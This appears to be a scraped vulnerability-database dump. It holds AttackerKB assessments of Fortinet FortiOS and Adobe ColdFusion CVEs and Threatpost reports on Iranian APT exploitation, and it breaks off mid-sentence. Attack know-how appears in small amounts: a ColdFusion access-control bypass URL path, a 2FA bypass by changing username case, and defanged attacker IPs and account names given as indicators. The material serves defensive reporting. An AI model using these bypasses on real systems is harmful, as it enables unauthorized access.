<https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-04T00:00:00", "type": "attackerkb", "title": "CVE-2018-13379 Path Traversal in Fortinet FortiOS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-07-27T00:00:00", "id": "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "href": "https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios/rapid7-analysis", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:43:23", "description": "An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 28, 2020 6:12pm UTC reported:\n\nThe advisory isn\u2019t worded very well, but it seems that logging in to the SSL VPN with a different-case username than set will allow 2FA to be bypassed, opening up the VPN to password attacks, such as password spraying.\n\nSuccessful VPN access to an internal network can open up a lot of doors for an attacker, turning an external compromise into an authorized internal one. Many corporate services are hidden behind VPN. That said, proper network segmentation and secondary access controls can mitigate some of the risk. The \u201cattacker value\u201d is \u201cmedium\u201d because this is just a 2FA bypass and also because of the listed caveats. It isn\u2019t terribly useful on its own.\n\nThe [KB article](<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>) is written much better.\n\n**ccondon-r7** at April 05, 2021 2:09pm UTC reported:\n\nThe advisory isn\u2019t worded very well, but it seems that logging in to the SSL VPN with a different-case username than set will allow 2FA to be bypassed, opening up the VPN to password attacks, such as password spraying.\n\nSuccessful VPN access to an internal network can open up a lot of doors for an attacker, turning an external compromise into an authorized internal one. Many corporate services are hidden behind VPN. That said, proper network segmentation and secondary access controls can mitigate some of the risk. The \u201cattacker value\u201d is \u201cmedium\u201d because this is just a 2FA bypass and also because of the listed caveats. It isn\u2019t terribly useful on its own.\n\nThe [KB article](<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>) is written much better.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T00:00:00", "type": "attackerkb", "title": "CVE-2020-12812", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-12812"], "modified": "2023-10-07T00:00:00", "id": "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "href": "https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T23:26:22", "description": "Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.\n\n \n**Recent assessments:** \n \n**sfewer-r7** at June 22, 2023 7:13pm UTC reported:\n\nAfter investigating a separate ColdFusion vulnerability [CVE-2023-26360](<https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis>) and in conjunction with privately reported information regarding CVE-2023-26359, I can rate this vulnerability as easily exploited and vulnerable in a default configuration.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-14T00:00:00", "type": "attackerkb", "title": "CVE-2023-26359", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26359", "CVE-2023-26360"], "modified": "2023-04-14T00:00:00", "id": "AKB:5DB640DC-B30F-464A-BC81-ED3C15946D65", "href": "https://attackerkb.com/topics/1iRdvtUgtW/cve-2023-26359", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:40", "description": "A deserialization of untrusted data vulnerability in Adobe ColdFusion versions 2021 and 2018 leads to arbitrary remote code execution.\n\n \n**Recent assessments:** \n \n**sfewer-r7** at June 22, 2023 7:05pm UTC reported:\n\nBased on writing an [exploit](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb>) and the [AttackerKB Analysis](<https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360#rapid7-analysis>), I can confirm the exploitability of this vulnerability is easy and in a default configuration of the target software.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-14T00:00:00", "type": "attackerkb", "title": "CVE-2023-26360", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26359", "CVE-2023-26360"], "modified": "2023-04-14T00:00:00", "id": "AKB:FB9BE99D-7DDE-493D-8C9D-12F3DD901458", "href": "https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-06T11:25:34", "description": "Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.\n\n \n**Recent assessments:** \n \n**sfewer-r7** at July 20, 2023 4:06pm UTC reported:\n\nAs per the [Rapid7 advisory](<https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/>), this vulnerability allows an attacker to bypass an access control feature designed to permit access to the ColdFusion Administrator endpoints on a ColdFusion web server based on the requesting IP address. When a request originates from an external IP address that is not present in the access controls allow list, access to the requested resource is blocked. At attacker can construct a URL whose path contains an unexpected forward slash, such as `//CFIDE/wizards/common/utils.cfc` and the resource can be accessed regardless of the requests IP address.\n\nThis vulnerability is particularly useful to an attacker as it can be chained with existing RCE vulnerabilities that require targeting CFC of CFRM endpoints ion the ColdFusion administrator, such as [CVE-2023-26360](<https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360>) or [CVE-2023-38203](<https://attackerkb.com/topics/61J8cvFAkt/cve-2023-38203>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T00:00:00", "type": "attackerkb", "title": "CVE-2023-29298", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360", "CVE-2023-29298", "CVE-2023-38203"], "modified": "2023-10-08T00:00:00", "id": "AKB:CC339C3D-417D-4477-92A7-746AEA51530C", "href": "https://attackerkb.com/topics/6LnuhTdLBy/cve-2023-29298", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: address that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors are proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** TODAY, Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event**__**!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-05T19:26:27", "description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company\u2019s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n\u201cIt is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,\u201d according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). \u201cAPT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n\u201cAttackers are increasingly targeting critical external applications \u2013 VPNs have been targeted even more this last year,\u201d said Zach Hanley, senior red team engineer at Horizon3.AI, via email. \u201cThese three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.\u201d\n\nHanley added, \u201cThe common theme here is: once they are successful, they will look just like your normal users.\u201d\n\nThe bugs are popular with cyberattackers in general, due to Fortinet\u2019s widespread footprint, researchers noted.\n\n\u201cCVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \u201cIn fact, Tenable\u2019s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.\u201d\n\nThe FBI and CISA didn\u2019t specify which APTs are mounting the recent activity.\n\n## Initial Compromise &amp; Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n\u201cThe APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,\u201d the warning explained. \u201cAPT actors may use other CVEs or common exploitation techniques\u2014such as spear-phishing\u2014to gain access to critical infrastructure networks to pre-position for follow-on attacks.\u201d\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year\u2019s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n\u201cIt\u2019s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,\u201d said Narang. \u201cOver the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven\u2019t done so already.\u201d\n\n## **How Can I Protect My Network from Cyberattacks? **\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization\u2019s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n * Regularly back up data, air-gap and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n * Implement network segmentation.\n * Require administrator credentials to install software.\n * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n * Use multifactor authentication where possible.\n * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Install and regularly update antivirus and anti-malware software on all hosts.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-02T19:56:57", "type": "threatpost", "title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-9922"], "modified": "2021-04-02T19:56:57", "id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T20:47:20", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as 